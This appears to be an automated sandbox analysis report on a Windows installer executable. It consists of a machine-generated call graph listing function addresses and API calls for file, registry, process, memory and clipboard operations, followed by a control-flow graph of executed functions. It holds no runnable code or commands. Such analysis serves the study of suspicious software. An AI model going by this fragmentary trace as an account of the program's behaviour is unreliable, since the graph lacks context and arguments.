405c37 ReadFile 4465->4468 4466 4026a2 4473 405e8f wsprintfW 4466->4473 4467 402608 MultiByteToWideChar 4467->4468 4468->4463 4468->4464 4468->4465 4468->4466 4468->4467 4470 40262e SetFilePointer MultiByteToWideChar 4468->4470 4471 4026b3 4468->4471 4470->4468 4471->4463 4472 4026d4 SetFilePointer 4471->4472 4472->4463 4473->4463 5286 401df3 5287 402b3a 18 API calls 5286->5287 5288 401df9 5287->5288 5289 402b3a 18 API calls 5288->5289 5290 401e02 5289->5290 5291 402b3a 18 API calls 5290->5291 5292 401e0b 5291->5292 5293 402b3a 18 API calls 5292->5293 5294 401e14 5293->5294 5295 401423 25 API calls 5294->5295 5296 401e1b ShellExecuteW 5295->5296 5297 401e4c 5296->5297 5303 100016b6 5304 100016e5 5303->5304 5305 10001b18 22 API calls 5304->5305 5306 100016ec 5305->5306 5307 100016f3 5306->5307 5308 100016ff 5306->5308 5309 10001272 2 API calls 5307->5309 5310 10001726 5308->5310 5311 10001709 5308->5311 5314 100016fd 5309->5314 5312 10001750 5310->5312 5313 1000172c 5310->5313 5315 1000153d 3 API calls 5311->5315 5317 1000153d 3 API calls 5312->5317 5316 100015b4 3 API calls 5313->5316 5318 1000170e 5315->5318 5320 10001731 5316->5320 5317->5314 5319 100015b4 3 API calls 5318->5319 5321 10001714 5319->5321 5322 10001272 2 API calls 5320->5322 5323 10001272 2 API calls 5321->5323 5324 10001737 GlobalFree 5322->5324 5325 1000171a GlobalFree 5323->5325 5324->5314 5326 1000174b GlobalFree 5324->5326 5325->5314 5326->5314 5327 10002238 5328 10002296 5327->5328 5330 100022cc 5327->5330 5329 100022a8 GlobalAlloc 5328->5329 5328->5330 5329->5328 4692 4026f9 4693 402700 4692->4693 4696 402972 4692->4696 4694 402b1d 18 API calls 4693->4694 4695 40270b 4694->4695 4697 402712 SetFilePointer 4695->4697 4697->4696 4698 402722 4697->4698 4700 405e8f wsprintfW 4698->4700 4700->4696 5331 1000103d 5332 1000101b 5 API calls 5331->5332 5333 10001056 5332->5333 5334 402c7f 5335 402c91 SetTimer 5334->5335 5336 402caa 5334->5336 5335->5336 5337 402cf8 5336->5337 5338 402cfe MulDiv 5336->5338 5339 402cb8 wsprintfW SetWindowTextW SetDlgItemTextW 5338->5339 5339->5337 5341 4014ff 5342 401507 5341->5342 5344 40151a 5341->5344 5343 402b1d 18 API calls 5342->5343 5343->5344 5345 401000 5346 401037 BeginPaint GetClientRect 5345->5346 5347 40100c DefWindowProcW 5345->5347 5348 4010f3 5346->5348 5350 401179 5347->5350 5351 401073 CreateBrushIndirect FillRect DeleteObject 5348->5351 5352 4010fc 5348->5352 5351->5348 5353 401102 CreateFontIndirectW 5352->5353 5354 401167 EndPaint 5352->5354 5353->5354 5355 401112 6 API calls 5353->5355 5354->5350 5355->5354 5356 401a00 5357 402b3a 18 API calls 5356->5357 5358 401a09 ExpandEnvironmentStringsW 5357->5358 5359 401a1d 5358->5359 5361 401a30 5358->5361 5360 401a22 lstrcmpW 5359->5360 5359->5361 5360->5361 5362 401b01 5363 402b3a 18 API calls 5362->5363 5364 401b08 5363->5364 5365 402b1d 18 API calls 5364->5365 5366 401b11 wsprintfW 5365->5366 5367 4029c7 5366->5367 4263 100027c7 4264 10002817 4263->4264 4265 100027d7 VirtualProtect 4263->4265 4265->4264 5375 401f08 5376 402b3a 18 API calls 5375->5376 5377 401f0f GetFileVersionInfoSizeW 5376->5377 5378 401f36 GlobalAlloc 5377->5378 5379 401f8c 5377->5379 5378->5379 5380 401f4a GetFileVersionInfoW 5378->5380 5380->5379 5381 401f59 VerQueryValueW 5380->5381 5381->5379 5382 401f72 5381->5382 5386 405e8f wsprintfW 5382->5386 5384 401f7e 5387 405e8f wsprintfW 5384->5387 5386->5384 5387->5379 5388 401c8e 5389 402b1d 18 API calls 5388->5389 5390 401c94 IsWindow 5389->5390 5391 4019f0 5390->5391 5392 1000164f 5393 10001516 GlobalFree 5392->5393 5396 10001667 5393->5396 5394 100016ad GlobalFree 5395 10001682 5395->5394 5396->5394 5396->5395 5397 10001699 VirtualFree 5396->5397 5397->5394 5405 401491 5406 4051f2 25 API calls 5405->5406 5407 401498 5406->5407 4497 402295 4498 402b3a 18 API calls 4497->4498 4499 4022a4 4498->4499 4500 402b3a 18 API calls 4499->4500 4501 4022ad 4500->4501 4502 402b3a 18 API calls 4501->4502 4503 4022b7 GetPrivateProfileStringW 4502->4503 4509 401f98 4510 401faa 4509->4510 4520 40205c 4509->4520 4511 402b3a 18 API calls 4510->4511 4512 401fb1 4511->4512 4514 402b3a 18 API calls 4512->4514 4513 401423 25 API calls 4518 402197 4513->4518 4515 401fba 4514->4515 4516 401fd0 LoadLibraryExW 4515->4516 4517 401fc2 GetModuleHandleW 4515->4517 4519 401fe1 4516->4519 4516->4520 4517->4516 4517->4519 4532 40631e WideCharToMultiByte 4519->4532 4520->4513 4523 401ff2 4526 402011 4523->4526 4527 401ffa 4523->4527 4524 40202b 4525 4051f2 25 API calls 4524->4525 4528 402002 4525->4528 4535 10001759 4526->4535 4529 401423 25 API calls 4527->4529 4528->4518 4530 40204e FreeLibrary 4528->4530 4529->4528 4530->4518 4533 406348 GetProcAddress 4532->4533 4534 401fec 4532->4534 4533->4534 4534->4523 4534->4524 4536 10001789 4535->4536 4577 10001b18 4536->4577 4538 10001790 4539 100018a6 4538->4539 4540 100017a1 4538->4540 4541 100017a8 4538->4541 4539->4528 4626 10002286 4540->4626 4609 100022d0 4541->4609 4546 100017cd 4547 1000180c 4546->4547 4548 100017ee 4546->4548 4552 10001812 4547->4552 4553 1000184e 4547->4553 4639 100024a9 4548->4639 4550 100017be 4551 100017c4 4550->4551 4556 100017cf 4550->4556 4551->4546 4620 100028a4 4551->4620 4558 100015b4 3 API calls 4552->4558 4560 100024a9 10 API calls 4553->4560 4554 100017d7 4554->4546 4636 10002b5f 4554->4636 4555 100017f4 4650 100015b4 4555->4650 4630 10002645 4556->4630 4563 10001828 4558->4563 4564 10001840 4560->4564 4567 100024a9 10 API calls 4563->4567 4568 10001895 4564->4568 4661 1000246c 4564->4661 4566 100017d5 4566->4546 4567->4564 4568->4539 4572 1000189f GlobalFree 4568->4572 4572->4539 4574 10001881 4574->4568 4665 1000153d wsprintfW 4574->4665 4575 1000187a FreeLibrary 4575->4574 4668 1000121b GlobalAlloc 4577->4668 4579 10001b3c 4669 1000121b GlobalAlloc 4579->4669 4581 10001d7a GlobalFree GlobalFree GlobalFree 4582 10001d97 4581->4582 4593 10001de1 4581->4593 4584 100020ee 4582->4584 4592 10001dac 4582->4592 4582->4593 4583 10001b47 4583->4581 4585 10001c1d GlobalAlloc 4583->4585 4587 10001c86 GlobalFree 4583->4587 4590 10001c68 lstrcpyW 4583->4590 4583->4593 4594 10001c72 lstrcpyW 4583->4594 4598 10002048 4583->4598 4602 10001f37 GlobalFree 4583->4602 4605 1000122c 2 API calls 4583->4605 4607 10001cc4 4583->4607 4675 1000121b GlobalAlloc 4583->4675 4586 10002110 GetModuleHandleW 4584->4586 4584->4593 4585->4583 4588 10002121 LoadLibraryW 4586->4588 4589 10002136 4586->4589 4587->4583 4588->4589 4588->4593 4676 100015ff WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4589->4676 4590->4594 4592->4593 4672 1000122c 4592->4672 4593->4538 4594->4583 4595 10002188 4595->4593 4596 10002195 lstrlenW 4595->4596 4677 100015ff WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4596->4677 4598->4593 4601 10002090 lstrcpyW 4598->4601 4601->4593 4602->4583 4603 10002148 4603->4595 4608 10002172 GetProcAddress 4603->4608 4604 100021af 4604->4593 4605->4583 4607->4583 4670 1000158f GlobalSize GlobalAlloc 4607->4670 4608->4595 4611 100022e8 4609->4611 4610 1000122c GlobalAlloc lstrcpynW 4610->4611 4611->4610 4613 10002415 GlobalFree 4611->4613 4615 100023d3 lstrlenW 4611->4615 4616 100023ba GlobalAlloc CLSIDFromString 4611->4616 4617 1000238f GlobalAlloc WideCharToMultiByte 4611->4617 4679 100012ba 4611->4679 4613->4611 4614 100017ae 4613->4614 4614->4546 4614->4550 4614->4554 4615->4613 4619 100023de 4615->4619 4616->4613 4617->4613 4619->4613 4683 100025d9 4619->4683 4622 100028b6 4620->4622 4621 1000295b EnumWindows 4623 10002979 4621->4623 4622->4621 4624 10002a75 4623->4624 4625 10002a6a GetLastError 4623->4625 4624->4546 4625->4624 4627 10002296 4626->4627 4629 100017a7 4626->4629 4628 100022a8 GlobalAlloc 4627->4628 4627->4629 4628->4627 4629->4541 4634 10002661 4630->4634 4631 100026b2 GlobalAlloc 4635 100026d4 4631->4635 4632 100026c5 4633 100026ca GlobalSize 4632->4633 4632->4635 4633->4635 4634->4631 4634->4632 4635->4566 4637 10002b6a 4636->4637 4638 10002baa GlobalFree 4637->4638 4686 1000121b GlobalAlloc 4639->4686 4641 10002530 StringFromGUID2 4644 100024b3 4641->4644 4642 10002541 lstrcpynW 4642->4644 4643 1000250b MultiByteToWideChar 4643->4644 4644->4641 4644->4642 4644->4643 4645 10002554 wsprintfW 4644->4645 4646 10002571 GlobalFree 4644->4646 4647 100025ac GlobalFree 4644->4647 4648 10001272 2 API calls 4644->4648 4687 100012e1 4644->4687 4645->4644 4646->4644 4647->4555 4648->4644 4691 1000121b GlobalAlloc 4650->4691 4652 100015ba 4653 100015c7 lstrcpyW 4652->4653 4655 100015e1 4652->4655 4656 100015fb 4653->4656 4655->4656 4657 100015e6 wsprintfW 4655->4657 4658 10001272 4656->4658 4657->4656 4659 100012b5 GlobalFree 4658->4659 4660 1000127b GlobalAlloc lstrcpynW 4658->4660 4659->4564 4660->4659 4662 10001861 4661->4662 4663 1000247a 4661->4663 4662->4574 4662->4575 4663->4662 4664 10002496 GlobalFree 4663->4664 4664->4663 4666 10001272 2 API calls 4665->4666 4667 1000155e 4666->4667 4667->4568 4668->4579 4669->4583 4671 100015ad 4670->4671 4671->4607 4678 1000121b GlobalAlloc 4672->4678 4674 1000123b lstrcpynW 4674->4593 4675->4583 4676->4603 4677->4604 4678->4674 4680 100012c1 4679->4680 4681 1000122c 2 API calls 4680->4681 4682 100012df 4681->4682 4682->4611 4684 100025e7 VirtualAlloc 4683->4684 4685 1000263d 4683->4685 4684->4685 4685->4619 4686->4644 4688 100012ea 4687->4688 4689 1000130c 4687->4689 4688->4689 4690 100012f0 lstrcpyW 4688->4690 4689->4644 4690->4689 4691->4652 5408 10001058 5410 10001074 5408->5410 5409 100010dd 5410->5409 5411 10001092 5410->5411 5412 10001516 GlobalFree 5410->5412 5413 10001516 GlobalFree 5411->5413 5412->5411 5414 100010a2 5413->5414 5415 100010b2 5414->5415 5416 100010a9 GlobalSize 5414->5416 5417 100010b6 GlobalAlloc 5415->5417 5418 100010c7 5415->5418 5416->5415 5419 1000153d 3 API calls 5417->5419 5420 100010d2 GlobalFree 5418->5420 5419->5418 5420->5409 5421 401718 5422 402b3a 18 API calls 5421->5422 5423 40171f SearchPathW 5422->5423 5424 40173a 5423->5424 4931 40159b 4932 402b3a 18 API calls 4931->4932 4933 4015a2 SetFileAttributesW 4932->4933 4934 4015b4 4933->4934 5425 40659d 5426 406421 5425->5426 5427 406d8c 5426->5427 5428 4064a2 GlobalFree 5426->5428 5429 4064ab GlobalAlloc 5426->5429 5430 406522 GlobalAlloc 5426->5430 5431 406519 GlobalFree 5426->5431 5428->5429 5429->5426 5429->5427 5430->5426 5430->5427 5431->5430 5432 40149e 5433 4014ac PostQuitMessage 5432->5433 5434 40223e 5432->5434 5433->5434 5435 4021a0 5436 402b3a 18 API calls 5435->5436 5437 4021a6 5436->5437 5438 402b3a 18 API calls 5437->5438 5439 4021af 5438->5439 5440 402b3a 18 API calls 5439->5440 5441 4021b8 5440->5441 5442 40628b 2 API calls 5441->5442 5443 4021c1 5442->5443 5444 4021d2 lstrlenW lstrlenW 5443->5444 5448 4021c5 5443->5448 5445 4051f2 25 API calls 5444->5445 5447 402210 SHFileOperationW 5445->5447 5446 4051f2 25 API calls 5449 4021cd 5446->5449 5447->5448 5447->5449 5448->5446 5448->5449 5450 100010e1 5459 10001111 5450->5459 5451 100011d8 GlobalFree 5452 100012ba 2 API calls 5452->5459 5453 100011d3 5453->5451 5454 10001164 GlobalAlloc 5454->5459 5455 100011f8 GlobalFree 5455->5459 5456 10001272 2 API calls 5458 100011c4 GlobalFree 5456->5458 5457 100012e1 lstrcpyW 5457->5459 5458->5459 5459->5451 5459->5452 5459->5453 5459->5454 5459->5455 5459->5456 5459->5457 5459->5458 5460 401b22 5461 401b73 5460->5461 5462 401b2f 5460->5462 5463 401b78 5461->5463 5464 401b9d GlobalAlloc 5461->5464 5467 401bb8 5462->5467 5468 401b46 5462->5468 5473 40223e 5463->5473 5481 405f48 lstrcpynW 5463->5481 5466 405f6a 18 API calls 5464->5466 5465 405f6a 18 API calls 5469 402238 5465->5469 5466->5467 5467->5465 5467->5473 5479 405f48 lstrcpynW 5468->5479 5475 405724 MessageBoxIndirectW 5469->5475 5472 401b8a GlobalFree 5472->5473 5474 401b55 5480 405f48 lstrcpynW 5474->5480 5475->5473 5477 401b64 5482 405f48 lstrcpynW 5477->5482 5479->5474 5480->5477 5481->5472 5482->5473 5483 4029a2 SendMessageW 5484 4029c7 5483->5484 5485 4029bc InvalidateRect 5483->5485 5485->5484 4109 401924 4110 401926 4109->4110 4111 402b3a 18 API calls 4110->4111 4112 40192b 4111->4112 4115 4057d0 4112->4115 4154 405a9b 4115->4154 4118 4057f8 DeleteFileW 4120 401934 4118->4120 4119 40580f 4121 40592f 4119->4121 4168 405f48 lstrcpynW 4119->4168 4121->4120 4198 40628b FindFirstFileW 4121->4198 4123 405835 4124 405848 4123->4124 4125 40583b lstrcatW 4123->4125 4169 4059df lstrlenW 4124->4169 4126 40584e 4125->4126 4129 40585e lstrcatW 4126->4129 4131 405869 lstrlenW FindFirstFileW 4126->4131 4129->4131 4131->4121 4139 40588b 4131->4139 4132 405958 4201 405993 lstrlenW CharPrevW 4132->4201 4135 405788 5 API calls 4138 40596a 4135->4138 4137 405912 FindNextFileW 4137->4139 4140 405928 FindClose 4137->4140 4141 405984 4138->4141 4142 40596e 4138->4142 4139->4137 4152 4058d3 4139->4152 4173 405f48 lstrcpynW 4139->4173 4140->4121 4144 4051f2 25 API calls 4141->4144 4142->4120 4145 4051f2 25 API calls 4142->4145 4144->4120 4147 40597b 4145->4147 4146 4057d0 64 API calls 4146->4152 4149 405de2 40 API calls 4147->4149 4148 4051f2 25 API calls 4148->4137 4150 405982 4149->4150 4150->4120 4152->4137 4152->4146 4152->4148 4174 405788 4152->4174 4182 4051f2 4152->4182 4193 405de2 4152->4193 4204 405f48 lstrcpynW 4154->4204 4156 405aac 4205 405a3e CharNextW CharNextW 4156->4205 4159 4057f0 4159->4118 4159->4119 4160 4061dc 5 API calls 4166 405ac2 4160->4166 4161 405af3 lstrlenW 4162 405afe 4161->4162 4161->4166 4164 405993 3 API calls 4162->4164 4163 40628b 2 API calls 4163->4166 4165 405b03 GetFileAttributesW 4164->4165 4165->4159 4166->4159 4166->4161 4166->4163 4167 4059df 2 API calls 4166->4167 4167->4161 4168->4123 4170 4059ed 4169->4170 4171 4059f3 CharPrevW 4170->4171 4172 4059ff 4170->4172 4171->4170 4171->4172 4172->4126 4173->4139 4211 405b8f GetFileAttributesW 4174->4211 4177 4057b5 4177->4152 4178 4057a3 RemoveDirectoryW 4180 4057b1 4178->4180 4179 4057ab DeleteFileW 4179->4180 4180->4177 4181 4057c1 SetFileAttributesW 4180->4181 4181->4177 4183 40520d 4182->4183 4184 4052af 4182->4184 4185 405229 lstrlenW 4183->4185 4186 405f6a 18 API calls 4183->4186 4184->4152 4187 405252 4185->4187 4188 405237 lstrlenW 4185->4188 4186->4185 4190 405265 4187->4190 4191 405258 SetWindowTextW 4187->4191 4188->4184 4189 405249 lstrcatW 4188->4189 4189->4187 4190->4184 4192 40526b SendMessageW SendMessageW SendMessageW 4190->4192 4191->4190 4192->4184 4214 4062b2 GetModuleHandleA 4193->4214 4197 405e0a 4197->4152 4199 4062a1 FindClose 4198->4199 4200 405954 4198->4200 4199->4200 4200->4120 4200->4132 4202 40595e 4201->4202 4203 4059af lstrcatW 4201->4203 4202->4135 4203->4202 4204->4156 4206 405a5b 4205->4206 4209 405a6d 4205->4209 4208 405a68 CharNextW 4206->4208 4206->4209 4207 405a91 4207->4159 4207->4160 4208->4207 4209->4207 4210 4059c0 CharNextW 4209->4210 4210->4209 4212 405ba1 SetFileAttributesW 4211->4212 4213 405794 4211->4213 4212->4213 4213->4177 4213->4178 4213->4179 4215 4062d9 GetProcAddress 4214->4215 4216 4062ce LoadLibraryA 4214->4216 4217 405de9 4215->4217 4216->4215 4216->4217 4217->4197 4218 405c66 lstrcpyW 4217->4218 4219 405cb5 GetShortPathNameW 4218->4219 4220 405c8f 4218->4220 4222 405cca 4219->4222 4223 405ddc 4219->4223 4243 405bb4 GetFileAttributesW CreateFileW 4220->4243 4222->4223 4225 405cd2 wsprintfA 4222->4225 4223->4197 4224 405c99 CloseHandle GetShortPathNameW 4224->4223 4226 405cad 4224->4226 4227 405f6a 18 API calls 4225->4227 4226->4219 4226->4223 4228 405cfa 4227->4228 4244 405bb4 GetFileAttributesW CreateFileW 4228->4244 4230 405d07 4230->4223 4231 405d16 GetFileSize GlobalAlloc 4230->4231 4232 405dd5 CloseHandle 4231->4232 4233 405d38 4231->4233 4232->4223 4245 405c37 ReadFile 4233->4245 4238 405d57 lstrcpyA 4241 405d79 4238->4241 4239 405d6b 4240 405b19 4 API calls 4239->4240 4240->4241 4242 405db0 SetFilePointer WriteFile GlobalFree 4241->4242 4242->4232 4243->4224 4244->4230 4246 405c55 4245->4246 4246->4232 4247 405b19 lstrlenA 4246->4247 4248 405b5a lstrlenA 4247->4248 4249 405b62 4248->4249 4250 405b33 lstrcmpiA 4248->4250 4249->4238 4249->4239 4250->4249 4251 405b51 CharNextA 4250->4251 4251->4248 5486 402224 5487 40223e 5486->5487 5488 40222b 5486->5488 5489 405f6a 18 API calls 5488->5489 5490 402238 5489->5490 5491 405724 MessageBoxIndirectW 5490->5491 5491->5487 5499 402729 5500 402730 5499->5500 5501 4029c7 5499->5501 5502 402736 FindClose 5500->5502 5502->5501 5503 401cab 5504 402b1d 18 API calls 5503->5504 5505 401cb2 5504->5505 5506 402b1d 18 API calls 5505->5506 5507 401cba GetDlgItem 5506->5507 5508 4024e8 5507->5508 5509 4042ae lstrcpynW lstrlenW 5510 4016af 5511 402b3a 18 API calls 5510->5511 5512 4016b5 GetFullPathNameW 5511->5512 5513 4016f1 5512->5513 5514 4016cf 5512->5514 5515 401706 GetShortPathNameW 5513->5515 5516 4029c7 5513->5516 5514->5513 5517 40628b 2 API calls 5514->5517 5515->5516 5518 4016e1 5517->5518 5518->5513 5520 405f48 lstrcpynW 5518->5520 5520->5513 4288 405331 4289 405352 GetDlgItem GetDlgItem GetDlgItem 4288->4289 4290 4054dd 4288->4290 4334 4041cf SendMessageW 4289->4334 4292 4054e6 GetDlgItem CreateThread CloseHandle 4290->4292 4293 40550e 4290->4293 4292->4293 4337 4052c5 OleInitialize 4292->4337 4295 405539 4293->4295 4296 405525 ShowWindow ShowWindow 4293->4296 4297 40555e 4293->4297 4294 4053c3 4300 4053ca GetClientRect GetSystemMetrics SendMessageW SendMessageW 4294->4300 4298 405545 4295->4298 4299 405599 4295->4299 4336 4041cf SendMessageW 4296->4336 4304 404201 8 API calls 4297->4304 4302 405573 ShowWindow 4298->4302 4303 40554d 4298->4303 4299->4297 4310 4055a7 SendMessageW 4299->4310 4308 405439 4300->4308 4309 40541d SendMessageW SendMessageW 4300->4309 4306 405593 4302->4306 4307 405585 4302->4307 4311 404173 SendMessageW 4303->4311 4305 40556c 4304->4305 4313 404173 SendMessageW 4306->4313 4312 4051f2 25 API calls 4307->4312 4314 40544c 4308->4314 4315 40543e SendMessageW 4308->4315 4309->4308 4310->4305 4316 4055c0 CreatePopupMenu 4310->4316 4311->4297 4312->4306 4313->4299 4318 40419a 19 API calls 4314->4318 4315->4314 4317 405f6a 18 API calls 4316->4317 4319 4055d0 AppendMenuW 4317->4319 4320 40545c 4318->4320 4321 405600 TrackPopupMenu 4319->4321 4322 4055ed GetWindowRect 4319->4322 4323 405465 ShowWindow 4320->4323 4324 405499 GetDlgItem SendMessageW 4320->4324 4321->4305 4326 40561b 4321->4326 4322->4321 4327 405488 4323->4327 4328 40547b ShowWindow 4323->4328 4324->4305 4325 4054c0 SendMessageW SendMessageW 4324->4325 4325->4305 4329 405637 SendMessageW 4326->4329 4335 4041cf SendMessageW 4327->4335 4328->4327 4329->4329 4330 405654 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4329->4330 4332 405679 SendMessageW 4330->4332 4332->4332 4333 4056a2 GlobalUnlock SetClipboardData CloseClipboard 4332->4333 4333->4305 4334->4294 4335->4324 4336->4295 4338 4041e6 SendMessageW 4337->4338 4339 4052e8 4338->4339 4342 40530f 4339->4342 4343 401389 2 API calls 4339->4343 4340 4041e6 SendMessageW 4341 405321 OleUninitialize 4340->4341 4342->4340 4343->4339 5521 402331 5522 402337 5521->5522 5523 402b3a 18 API calls 5522->5523 5524 402349 5523->5524 5525 402b3a 18 API calls 5524->5525 5526 402353 RegCreateKeyExW 5525->5526 5527 40237d 5526->5527 5529 402793 5526->5529 5528 402398 5527->5528 5530 402b3a 18 API calls 5527->5530 5531 402b1d 18 API calls 5528->5531 5534 4023a4 5528->5534 5533 40238e lstrlenW 5530->5533 5531->5534 5532 4023bf RegSetValueExW 5536 4023d5 RegCloseKey 5532->5536 5533->5528 5534->5532 5535 403062 46 API calls 5534->5535 5535->5532 5536->5529 5538 404635 5539 404661 5538->5539 5540 404672 5538->5540 5599 405708 GetDlgItemTextW 5539->5599 5541 40467e GetDlgItem 5540->5541 5548 4046dd 5540->5548 5544 404692 5541->5544 5543 40466c 5546 4061dc 5 API calls 5543->5546 5547 4046a6 SetWindowTextW 5544->5547 5551 405a3e 4 API calls 5544->5551 5545 4047c1 5597 404955 5545->5597 5601 405708 GetDlgItemTextW 5545->5601 5546->5540 5552 40419a 19 API calls 5547->5552 5548->5545 5553 405f6a 18 API calls 5548->5553 5548->5597 5550 404201 8 API calls 5555 404969 5550->5555 5556 40469c 5551->5556 5557 4046c2 5552->5557 5558 404751 SHBrowseForFolderW 5553->5558 5554 4047f1 5559 405a9b 18 API calls 5554->5559 5556->5547 5563 405993 3 API calls 5556->5563 5560 40419a 19 API calls 5557->5560 5558->5545 5561 404769 CoTaskMemFree 5558->5561 5562 4047f7 5559->5562 5564 4046d0 5560->5564 5565 405993 3 API calls 5561->5565 5602 405f48 lstrcpynW 5562->5602 5563->5547 5600 4041cf SendMessageW 5564->5600 5567 404776 5565->5567 5570 4047ad SetDlgItemTextW 5567->5570 5574 405f6a 18 API calls 5567->5574 5569 4046d6 5572 4062b2 3 API calls 5569->5572 5570->5545 5571 40480e 5573 4062b2 3 API calls 5571->5573 5572->5548 5581 404816 5573->5581 5575 404795 lstrcmpiW 5574->5575 5575->5570 5577 4047a6 lstrcatW 5575->5577 5576 404855 5603 405f48 lstrcpynW 5576->5603 5577->5570 5579 40485c 5580 405a3e 4 API calls 5579->5580 5582 404862 GetDiskFreeSpaceW 5580->5582 5581->5576 5585 4059df 2 API calls 5581->5585 5586 4048a7 5581->5586 5584 404885 MulDiv 5582->5584 5582->5586 5584->5586 5585->5581 5587 4049d6 21 API calls 5586->5587 5596 404904 5586->5596 5588 4048f6 5587->5588 5591 404906 SetDlgItemTextW 5588->5591 5592 4048fb 5588->5592 5589 40140b 2 API calls 5590 404927 5589->5590 5604 4041bc KiUserCallbackDispatcher 5590->5604 5591->5596 5594 4049d6 21 API calls 5592->5594 5594->5596 5595 404943 5595->5597 5605 4045ca 5595->5605 5596->5589 5596->5590 5597->5550 5599->5543 5600->5569 5601->5554 5602->5571 5603->5579 5604->5595 5606 4045d8 5605->5606 5607 4045dd SendMessageW 5605->5607 5606->5607 5607->5597 5608 4027b5 5609 402b3a 18 API calls 5608->5609 5610 4027c3 5609->5610 5611 4027d9 5610->5611 5612 402b3a 18 API calls 5610->5612 5613 405b8f 2 API calls 5611->5613 5612->5611 5614 4027df 5613->5614 5634 405bb4 GetFileAttributesW CreateFileW 5614->5634 5616 4027ec 5617 402895 5616->5617 5618 4027f8 GlobalAlloc 5616->5618 5621 4028b0 5617->5621 5622 40289d DeleteFileW 5617->5622 5619 402811 5618->5619 5620 40288c CloseHandle 5618->5620 5635 40330f SetFilePointer 5619->5635 5620->5617 5622->5621 5624 402817 5625 4032f9 ReadFile 5624->5625 5626 402820 GlobalAlloc 5625->5626 5627 402830 5626->5627 5628 402864 WriteFile GlobalFree 5626->5628 5629 403062 46 API calls 5627->5629 5630 403062 46 API calls 5628->5630 5633 40283d 5629->5633 5631 402889 5630->5631 5631->5620 5632 40285b GlobalFree 5632->5628 5633->5632 5634->5616 5635->5624 5636 4028b6 5637 402b1d 18 API calls 5636->5637 5638 4028bc 5637->5638 5639 4028f8 5638->5639 5640 4028df 5638->5640 5644 402793 5638->5644 5642 402902 5639->5642 5643 40290e 5639->5643 5641 4028e4 5640->5641 5649 4028f5 5640->5649 5650 405f48 lstrcpynW 5641->5650 5645 402b1d 18 API calls 5642->5645 5646 405f6a 18 API calls 5643->5646 5645->5649 5646->5649 5649->5644 5651 405e8f wsprintfW 5649->5651 5650->5644 5651->5644 5652 404337 5653 40434f 5652->5653 5660 404469 5652->5660 5657 40419a 19 API calls 5653->5657 5654 4044d3 5655 4045a5 5654->5655 5656 4044dd GetDlgItem 5654->5656 5662 404201 8 API calls 5655->5662 5658 404566 5656->5658 5659 4044f7 5656->5659 5661 4043b6 5657->5661 5658->5655 5667 404578 5658->5667 5659->5658 5666 40451d 6 API calls 5659->5666 5660->5654 5660->5655 5663 4044a4 GetDlgItem SendMessageW 5660->5663 5664 40419a 19 API calls 5661->5664 5665 4045a0 5662->5665 5683 4041bc KiUserCallbackDispatcher 5663->5683 5670 4043c3 CheckDlgButton 5664->5670 5666->5658 5671 40458e 5667->5671 5672 40457e SendMessageW 5667->5672 5669 4044ce 5673 4045ca SendMessageW 5669->5673 5681 4041bc KiUserCallbackDispatcher 5670->5681 5671->5665 5675 404594 SendMessageW 5671->5675 5672->5671 5673->5654 5675->5665 5676 4043e1 GetDlgItem 5682 4041cf SendMessageW 5676->5682 5678 4043f7 SendMessageW 5679 404414 GetSysColor 5678->5679 5680 40441d SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5678->5680 5679->5680 5680->5665 5681->5676 5682->5678 5683->5669 5684 4014b8 5685 4014be 5684->5685 5686 401389 2 API calls 5685->5686 5687 4014c6 5686->5687 4701 4015b9 4702 402b3a 18 API calls 4701->4702 4703 4015c0 4702->4703 4704 405a3e 4 API calls 4703->4704 4711 4015c9 4704->4711 4705 401614 4707 401619 4705->4707 4708 401646 4705->4708 4706 4059c0 CharNextW 4709 4015d7 CreateDirectoryW 4706->4709 4710 401423 25 API calls 4707->4710 4713 401423 25 API calls 4708->4713 4709->4711 4712 4015ed GetLastError 4709->4712 4714 401620 4710->4714 4711->4705 4711->4706 4712->4711 4715 4015fa GetFileAttributesW 4712->4715 4718 40163e 4713->4718 4719 405f48 lstrcpynW 4714->4719 4715->4711 4717 40162d SetCurrentDirectoryW 4717->4718 4719->4717 5688 401939 5689 402b3a 18 API calls 5688->5689 5690 401940 lstrlenW 5689->5690 5691 4024e8 5690->5691 5692 40293b 5693 402b1d 18 API calls 5692->5693 5694 402941 5693->5694 5695 402974 5694->5695 5696 402793 5694->5696 5698 40294f 5694->5698 5695->5696 5697 405f6a 18 API calls 5695->5697 5697->5696 5698->5696 5700 405e8f wsprintfW 5698->5700 5700->5696 4935 40173f 4936 402b3a 18 API calls 4935->4936 4937 401746 4936->4937 4938 405be3 2 API calls 4937->4938 4939 40174d 4938->4939 4940 405be3 2 API calls 4939->4940 4940->4939 5708 10002a7f 5709 10002a97 5708->5709 5710 1000158f 2 API calls 5709->5710 5711 10002ab2 5710->5711

                                                          Executed Functions

                                                          Function 0040335A Relevance: 75.6, APIs: 27, Strings: 16, Instructions: 383stringfilecomCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 0 40335a-4033f2 #17 SetErrorMode OleInitialize call 4062b2 SHGetFileInfoW call 405f48 GetCommandLineW call 405f48 GetModuleHandleW 7 4033f4-4033f6 0->7 8 4033fb-40340f call 4059c0 CharNextW 0->8 7->8 11 40350a-403510 8->11 12 403414-40341a 11->12 13 403516 11->13 14 403423-40342a 12->14 15 40341c-403421 12->15 16 40352a-403544 GetTempPathW call 403326 13->16 17 403432-403436 14->17 18 40342c-403431 14->18 15->14 15->15 23 403546-403564 GetWindowsDirectoryW lstrcatW call 403326 16->23 24 40359c-4035b6 DeleteFileW call 402dbc 16->24 20 4034f7-403506 call 4059c0 17->20 21 40343c-403442 17->21 18->17 20->11 39 403508-403509 20->39 26 403444-40344b 21->26 27 40345c-403495 21->27 23->24 43 403566-403596 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403326 23->43 45 403667-403676 call 40382d OleUninitialize 24->45 46 4035bc-4035c2 24->46 31 403452 26->31 32 40344d-403450 26->32 33 4034b2-4034ec 27->33 34 403497-40349c 27->34 31->27 32->27 32->31 36 4034f4-4034f6 33->36 37 4034ee-4034f2 33->37 34->33 40 40349e-4034a6 34->40 36->20 37->36 44 403518-403525 call 405f48 37->44 39->11 41 4034a8-4034ab 40->41 42 4034ad 40->42 41->33 41->42 42->33 43->24 43->45 44->16 